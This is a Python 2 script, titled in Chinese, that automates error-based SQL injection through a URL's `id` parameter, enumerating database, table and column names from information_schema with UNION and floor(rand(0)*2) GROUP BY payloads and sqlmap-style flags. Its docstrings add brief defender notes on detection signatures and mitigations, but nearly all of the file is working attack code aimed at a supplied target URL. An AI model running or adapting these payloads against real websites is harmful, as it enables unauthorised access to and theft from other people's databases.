能够爆数据库,表,和字段的基于报错注入的Python代码
import re
import sys
import requests
import binascii
def Get_db(url):
    """Enumerate schema names through an error-based SQL injection in `id`.

    Python 2 only (print statement, xrange, str-typed resp.content).

    Every request appends a UNION/GROUP BY payload to `url` and expects the
    target to echo database error text that contains a value wrapped in
    0x3a3a3a (":::"); the value is recovered from the response body with a
    regex.  Nothing is returned; results go to stdout.

    Defender's view: the query string is trivially signaturable on
    `information_schema.COLUMNS`, `floor(rand(0)*2)`, `group by` and the
    `--+` terminator; the root mitigation is parameterised queries and not
    returning raw DB error messages to the client.

    Args:
        url: base URL; "?id=..." is concatenated verbatim (no encoding).
    Raises:
        AttributeError: re.search() returns None when no ":::...:::" marker
            is present in the response (errors not echoed, WAF, etc.).
        ValueError: the count capture is empty.
    """
    # Probe 1: count of distinct schemas, echoed between ':::' markers.
    url_dbs_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_schema) from information_schema.COLUMNS),0x3a3a3a)a from information_schema.tables group by a)b --+"
    resp = requests.get(url_dbs_num)
    html = resp.content
    # `\d?` captures at most one digit, so the marker must hold a 0-9 count.
    db_num = int(re.search(r':::(\d?):::',html).group(1))
    print "Database number : %d" % db_num
    # Probe 2..N+1: one GET per schema, selecting row n with LIMIT n,1.
    for n in xrange(0,db_num):
        url_dbs_table = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_schema from information_schema.COLUMNS limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % n
        resp = requests.get(url_dbs_table)
        html = resp.content
        # Non-greedy capture of whatever sits between the two ':::' markers.
        db_name = re.search(r':::(.*?):::',html).group(1)
        print db_name
def Get_table(url,db_name):
    """Enumerate table names of one schema via the same error-based payload.

    Python 2 only (print statement, xrange, binascii.b2a_hex on str).

    Args:
        url: base URL; "?id=..." is concatenated verbatim.
        db_name: schema name as a plain string; it is rewritten below as a
            "0x..." hex literal and substituted unquoted into
            `table_schema=%s`.
    Raises:
        AttributeError: no ":::...:::" marker in the response
            (re.search() returned None).
        ValueError: the count capture is empty.

    Defender's view: same request signature as Get_db, plus a `0x`-hex
    literal compared against `table_schema`; the fix is parameterised
    queries and suppressing DB error text in HTTP responses.
    """
    # Hex-encode the name so the payload needs no quote characters.
    db_name = "0x" + binascii.b2a_hex(db_name)
    # Probe 1: number of distinct tables in the schema.
    url_tables_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_name) from information_schema.COLUMNS where table_schema=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % db_name
    resp = requests.get(url_tables_num)
    html = resp.content
    # `\d?` captures at most a single digit.
    tables_num = int(re.search(r':::(\d?):::',html).group(1))
    print "tables number : %d" % tables_num
    # One GET per table, row n selected with LIMIT n,1.
    for n in xrange(0,tables_num):
        url_tablename = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_name from information_schema.COLUMNS where table_schema=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,n)
        resp = requests.get(url_tablename)
        html = resp.content
        table_name = re.search(r":::(.*?):::",html).group(1)
        print table_name
def Get_column(url,db_name,table_name):
    """Enumerate column names of one table via the same error-based payload.

    Python 2 only (print statement, xrange, binascii.b2a_hex on str).

    Args:
        url: base URL; "?id=..." is concatenated verbatim.
        db_name: schema name, rewritten as a "0x..." hex literal.
        table_name: table name, rewritten as a "0x..." hex literal.
    Raises:
        AttributeError: no ":::...:::" marker in the response
            (re.search() returned None).
        ValueError: the count capture is empty.

    Defender's view: identical detection surface to Get_db/Get_table;
    the response-side mitigation is to never echo database error messages
    to the client, the query-side one is parameterised SQL.
    """
    # Hex literals avoid quote characters in the payload.
    db_name = "0x" + binascii.b2a_hex(db_name)
    table_name = "0x" + binascii.b2a_hex(table_name)
    # Probe 1: number of distinct columns in the table.
    url_columns_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct column_name) from information_schema.COLUMNS where table_schema=%s and table_name=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name)
    resp = requests.get(url_columns_num)
    html = resp.content
    # `\d?` captures at most a single digit.
    columns_num = int(re.search(r":::(\d?):::",html).group(1))
    print "Columns number : %d" % columns_num
    # One GET per column, row n selected with LIMIT n,1.
    for n in xrange(0,columns_num):
        url_columns_name = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct column_name from information_schema.COLUMNS where table_schema=%s and table_name=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name,n)
        resp = requests.get(url_columns_name)
        html = resp.content
        column_name = re.search(r":::(.*?):::",html).group(1)
        print column_name
def main():
    """Dispatch on positional argv in one of three fixed shapes.

        <url> --dbs
        <url> -D <db> --tables
        <url> -D <db> -T <table> --columns

    sys.argv is indexed without a length check, so a missing argument
    raises IndexError; an argv that matches none of the branches does
    nothing and prints nothing.
    """
    if sys.argv[2] == '--dbs':
        Get_db(sys.argv[1])
    elif sys.argv[2] == '-D' and sys.argv[4] == '--tables':
        Get_table(sys.argv[1],sys.argv[3])
    elif sys.argv[2] == '-D' and sys.argv[4] == '-T' and sys.argv[6] == '--columns':
        Get_column(sys.argv[1],sys.argv[3],sys.argv[5])
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()